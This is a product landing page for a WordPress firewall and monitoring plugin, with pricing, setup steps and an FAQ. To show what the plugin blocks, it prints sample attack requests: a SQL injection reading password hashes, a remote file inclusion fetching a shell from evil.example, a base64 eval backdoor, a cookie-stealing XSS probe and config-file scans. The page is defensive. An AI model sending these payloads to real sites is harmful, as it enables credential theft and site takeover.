Know what’s knocking on your WordPress site.

RequestGuard watches every request to your website, blocks hacking attempts like SQL injection and remote file inclusion, and emails you the moment a file is altered or a stranger logs in.

CHF 2.00 per site per month. Installs in two minutes. Pay with TWINT.

Live bakery-dupont.ch
  1. GET/menu/200
  2. GET/?id=1' UNION SELECT user_pass FROM wp_usersBlocked · SQL injection
  3. GET/blog/sourdough-at-home/200
  4. POST/wp-admin/admin-ajax.php200
  5. GET/?page=http://evil.example/sh.txt?Blocked · Remote file inclusion
  6. GET/contact/200
  7. POST/wp-login.php · 9th wrong passwordIP blocked · brute force
  8. GET/shop/croissant-box/200

The attacks it catches, in plain words

Most WordPress hacks start the same way: automated bots trying known tricks on thousands of sites a day. RequestGuard recognises them, blocks them before WordPress runs, and tells you.

SQL injection

Database commands typed into a URL or a form, to read your users, passwords and orders.

GET /?id=1' UNION SELECT user_login,user_pass FROM wp_users

File inclusion (RFI / LFI)

Tricking your site into running code from another server, or into showing wp-config.php with your database password.

GET /?page=http://evil.example/shell.txt?

Altered and hacked files

Backdoors hidden in plugins, modified WordPress core files, PHP scripts dropped into your uploads folder. Checked against the official WordPress files every day.

wp-content/uploads/2026/03/cache.php · eval(base64_decode(…))

Password guessing

Bots trying thousands of passwords on wp-login.php and XML-RPC. RequestGuard blocks the IP after a few tries — on all your sites at once.

POST /xmlrpc.php system.multicall × 500 passwords

Script injection (XSS)

JavaScript slipped into links and comments, to steal your visitors’ sessions or redirect them to scam pages.

GET /?s=<script>document.cookie

Logins you didn’t make

An administrator account signing in from an IP it has never used. If it wasn’t you or your team, you know within a minute.

admin signed in from 185.220.101.4 · new IP

Scanners and probes

Tools hunting for leaked .env files, database backups and plugins with known holes.

GET /.env · /wp-config.php.bak · /phpmyadmin/

Floods and odd traffic

One address hammering your site, bots without a name, error spikes. All visible, all searchable, with the full request.

412 requests in one minute from one IP

Set up in two minutes

  1. Create your account

    Choose how many sites to protect and pay the first month with TWINT, Revolut or card.

  2. Install the plugin

    Upload the RequestGuard plugin to WordPress and paste your connection code. The same code works on all your sites.

  3. Get on with your day

    Attacks are blocked automatically. You get an email when something needs you, and a short report every morning.

The RequestGuard panel: requests, threats and blocked attacks for each website
Your panel at my.requestguard.ch: every request searchable, threats explained, one click to block an address.

One price per website

No plans to compare. Every site gets everything: request log, firewall, file checks, email alerts and the daily report. Add or remove sites whenever you like — your next invoice follows.

  • Every request logged and searchable for 30 days
  • Firewall against SQL injection, RFI/LFI, XSS and more
  • Daily file integrity check against official WordPress files
  • Brute-force and scanner blocking shared across all protected sites
  • Instant email alerts and a daily threat report
  • Monthly invoice, cancel anytime
3

CHF 6.00 per month

CHF 2.00 per site per month

Pay each month with TWINT, Revolut, PostFinance, Visa or Mastercard.

Questions

Will it slow down my website?

No noticeable difference. The plugin stores one small line per request and sends them in the background once a minute. Blocking happens before WordPress loads your theme, so attacks actually cost your server less.

Can it block real visitors by mistake?

The firewall only blocks requests that match clear attack patterns. Logged-in editors and administrators are never blocked by patterns, and you can allow your own IP addresses in one click. You can also switch a site to monitoring only.

What data do you collect?

For each request: time, IP address, URL, browser, response code and timing, the logged-in username, and form fields. Passwords, tokens and payment fields are replaced with [redacted] on your server before anything is sent. Logs are deleted after 30 days. Mention RequestGuard in your privacy policy.

How does the file check work?

Every day the plugin compares your WordPress core files with the official copies published by WordPress, looks for PHP files in your uploads folder, detects plugin and theme files that changed without an update, and searches new files for known malware code. Anything suspicious appears in your panel and by email.

Does it replace backups and updates?

No. RequestGuard tells you what is happening and stops common attacks, but you still need backups and up-to-date plugins. It will tell you when something looks wrong so you can restore quickly.

How do I pay?

Each month you receive an invoice for your connected sites and pay it with TWINT, Revolut, PostFinance or a card. If a payment is late, your sites stay protected during a grace period before protection pauses.

I manage many client sites. Is that a problem?

That is what it is built for. Use one connection code on every site and see them all in one panel. Each new site is added to your next invoice automatically.

Does it log pages served from cache?

Pages delivered by a full-page cache (WP Rocket, LiteSpeed, Cloudflare APO…) without starting WordPress are not seen. Attacks almost never hit the cache: they target logins, forms, the REST API and files that don’t exist, which all reach WordPress.

Let the cat watch the door.

Protect my site for CHF 2.00 a month